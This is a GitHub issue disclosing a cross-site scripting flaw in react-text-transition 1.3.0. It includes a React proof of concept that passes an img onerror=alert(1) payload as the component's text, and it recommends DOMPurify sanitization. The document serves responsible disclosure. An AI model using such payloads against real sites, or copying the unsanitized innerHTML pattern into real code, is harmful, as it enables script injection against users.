XSS vulnerability in react-text-transition@1.3.0 #71

New issue

Open

@gtsp233

Description

@gtsp233

gtsp233

opened

on Jan 23, 2024

I've found a Cross-Site Scripting (XSS) vulnerability in this package

Vulnerability Details:

Severity: High/Critical
Description: There's a risk of malicious script execution when an adversory controls the text.

Steps to Reproduce:
In a React.js project:

import React from "react";
import TextTransition, { presets } from "react-text-transition";
const App = () => {
 const [index, setIndex] = React.useState(0);
 React.useEffect(() => {
 const intervalId = setInterval(() =>
 setIndex(index => index + 1),
 3000 // every 3 seconds
 );
 return () => clearTimeout(intervalId);
 }, []);
 return (
 <h1>
 <TextTransition
 text={`<img src='' onerror=alert(1)></img>`}
 springConfig={presets.wobbly}
 />
 </h1>
 );
};
export default App

Suggested Fix or Mitigation:
It is best practice to sanitize the text before passing it to innerHTML. Please consider sanitizing it using popular sanitization libraries, e.g., dompurify, to prevent any XSS. Thanks!

Metadata

Assignees

No one assigned

Labels

No labels

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Navigation Menu

Search code, repositories, users, issues, pull requests...

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

XSS vulnerability in react-text-transition@1.3.0 #71

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions